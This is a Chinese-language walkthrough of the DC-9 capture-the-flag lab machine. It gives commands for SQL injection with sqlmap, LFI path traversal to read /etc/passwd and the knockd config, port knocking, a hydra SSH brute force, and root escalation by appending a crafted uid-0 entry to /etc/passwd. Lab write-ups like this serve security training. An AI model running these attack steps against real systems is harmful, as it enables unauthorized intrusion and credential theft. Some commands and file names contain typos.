内网渗透-DC-9靶机渗透

攻击机：kali 192.168.236.137

目标机：dc-9 192.168.236.138

一、信息收集
1.使用arp-scan -l和nmap进行主机发现和端口信息收集

nmap -sS -T5 --min-rate 10000 192.168.236.138 -sC -p-

发现22端口被阻塞

2.whatweb收集一下cms指纹信息

what http://192.168.236.138

3.访问web界面，找一找，发现search这个地方可以查询信息

这意味着与数据库产生交互，可能会有注入

尝试一下，'or 1=1 --+

这是一个sql注入，查看源码发现跳转界面是results.php，表单name为search

二、SQL注入

1.使用sqlmap -u "http://192.168.236.138/results.php" --data "search=1" --dbs 爆库名

2.使用sqlmap -u "http://192.168.236.138/results.php" --data "search=1" -D Staff -T Users --dump字段内容

爆出一个用户名和密码

admin:transorbitall

3.爆另一个库中的表的字段内容

4.使用admin登陆web界面，发现file does not exist(有可能存在文件包含)

三、文件包含（LFI）漏洞

猜测文件包含参数为file，

可以通过burp爆破一下

也可以通过FUZZ爆破

wfuzz -b 'PHPSESSID=4a2q7go730gbc8g8crv5q67l95' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.138/manage.php?FUZZ=index.php

过滤

wfuzz --hw 100 -b 'PHPSESSID=4a2q7go730gbc8g8crv5q67l95' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.138/manage.php?FUZZ=index.php

1.不知道在哪一层，直接填满，使用../../../../../../../切一下路径../../../../../etc/passwd

端口保护之端口敲门（knock）

就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制

3.端口敲门这个文件路径一定在/etc/konckd.conf

http://192.168.236.138/welcome.php?file=../../../../../../../../../../../../../etc/konckd.conf

4 依次使用nc或者nmap敲门

nmap再次扫描一下发现22端口开放了

6.使用之前得到的用户名和密码去爆破ssh服务（使用九头蛇hydra）

hydra -L username.txt（之前爆出的一堆用户名） -P password.txt（之前爆出的一堆密码） 192.168.236.138 ssh

7.使用janitor登陆，发现了一个密码文件

8 猜测是密码，放到之前密码文件里再次爆破，得到一个新用户

9.使用新用户登录，发现sudo -l可以使用，得到了一个可以以root身份执行的脚本

四、准备提权

1.根据提示找到脚本的位置，然后再它的前几级目录发现了它是一个python脚本，和它的使用方法

把第一个参数的内容追加到第二的参数中

2 使用openssl passwd -1 -salt admin 123456，生成一个加密的密码

3.按照/etc/passwd的格式写一个文件，通过test脚本追加到/etc/passwd中即可提权

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

成功提权

得到flag

参考链接：

DC-9靶机渗透_在对靶场dc-9的渗透测试中攻击目标是什么-CSDN博客